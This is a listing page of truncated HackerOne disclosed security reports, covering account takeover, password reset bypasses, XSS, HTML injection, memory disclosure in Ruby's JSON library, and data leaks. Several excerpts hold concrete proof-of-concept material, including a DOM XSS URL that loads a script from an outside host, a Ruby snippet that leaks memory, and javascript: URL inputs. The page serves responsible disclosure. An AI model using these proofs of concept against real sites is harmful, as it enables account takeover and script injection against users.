HackerOne Reports
Search through disclosed security reports
10,350 reports found
Showing 681 - 700
This bug was reported directly to GitHub Security Lab.
## Summary: I've found that I can Bypass Email verification from the leaked verfication token at `/api/v1/user/breaches` At `monitor.mozilla.org` ## Steps To Reproduce: 1. Add email address for monitoring 1. it needs Email verification from the email owner 1. Go to `/api/v1/user/breaches` , you'll find the whole data for the …
**Description:** During my search in this domain I found it vulnerable to CSRF so I tried to escalate it Account takeover and I succeed ## Impact Account takeover via CSRF ## System Host(s) █████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce Vulnerable domain and endpoint …
**Product / URL** https://instagram-brand.com/register/reset/<the security token here>?email=<your email here> **Description and Impact** After a user clicks on the password reset link obtained in inbox, the page for password resetting functionality opens. If you monitor the HTTP Requests that are done while that page is loaded, you will come to know …
**Product / URL** https://en.instagram-brand.com/wp-json/brc/v1/login/ **Description and Impact** An attacker can perform account takeover by leveraging following two vulnerabilities: Auth Bypass = Username Enumeration + Login Brute Force A. Username Enumeration: ------------------------------- For the site https://en.instagram-brand.com/, it is made sure that a malicious user cannot enumerate usernames of the users by …
**Summary:** For new feature settings, you accept website URLs like javascript:// or data:// in base urls. Even https://evil.com works, this needs to be stripped, this can be used to create another integrations without ### Steps To Reproduce 1. https://hackerone.com/(Team)/integrations/jira/edit 2. Try in Base URL: javascript:// or data:// 3. It will …
Running this snippet can expose arbitrary memory: ```ruby require 'json' state = JSON.state.new state.space = "\0" * 1024 puts JSON.generate({a: :b}, state) ``` ``` {"a": psych/handlers/recorder.rb tensi0 reeze) Gem::Specification.new do |s| # to objects of the same type as the original delegate. mydata/scm/git/ruby/dist/lib/ruby/2.5.0/json/ext.rb pass the namP See http://guides.rubygems.org/specification-reference/ for help …
Hello Starbucks team,, I've discovered DOM XSS on `teavana.com` involving `pr_zip_location` URL parameter. PoC: http://www.teavana.com/us/en/tea/green-tea/winterberry-tea-blend-32601.html?pr_zip_location=//whitehat-hacker.com/xss.j? Works in all major browsers. Vulnerable code is in `full.js`: ```js var DR = Z(DS) + "/content/" + k(DQ) + "/contents.js"; ``` That allows to execute absolutely arbitrary javascript in the context on `teavana.com` domain. …
Hi, I found a design issue in the profile statement for the registered user. This is dependant on the end user however. In the profile statement, one can write something as well giving links is allowed. This, I think is by design. However, let us suppose the authenticated user creates …
Hi, #Description: Content spoofing, also referred to as content injection or virtual defacement, is an attack targeting a user made possible by an injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply content to a web application, typically via …
**Summary:** Hi Hackerone Team, Before i reported that email forwarding of private can be enumerated and any user join to private program here #201369 , __but this seems by design__, but now it i found a related issue which can cause a security impact on private program because the email …
Calling the native contract (`rskj-core/src/main/java/co/rsk/pcc/NativeContract.java`) with an invalid, large input (1081344 bytes -- I experimentally determined that this is about the slowest I can go) in an infinite loop (until gas runs out) takes about 70 seconds on my machine (I assume ~23 seconds on your machine). (Slightly faster than …
A vulnerability in xvideos.com allows an attacker to register using victim email addresses which are unverified. This can be further exploited to enable two-factor authentication (2FA), permanently locking the victim out of their own email account. This results in a denial-of-service attack against the legitimate email owner. Steps to Reproduce: …
## Summary: [summary of the vulnerability] A heap use after free (or assertion) can be triggered if some allocations fail I am not sure you consider allocations failures to be part of security issues, and I am not sure the issue lies in curl or in openssl, but I still …
## Description Hi team, I found an interesting flaw in your password recovery mechanism that can get the ability of reset password without a valid token and knowing current password. I'm going to explain it here: In https://www.twitterflightschool.com/ domain if you try to reset your password from https://www.twitterflightschool.com/student/authentication/request_password_reset you'll get …
## Summary: A HTML injection vulnerability exists in the packing slip generator, allowing customers to alter the logistical process of their and other's orders for shops that choose to display the user's e-mail address on the packing slip. The success rate depends on the shops setup and can result in …
**Summary** While performing recon work on websites owned by DoD i came up with ██████████ website which is leaking sensitive information. **Description** The above website is leaking information such as- first name and last name, email address, phone number, house address and organization name of attendees in a clear readable …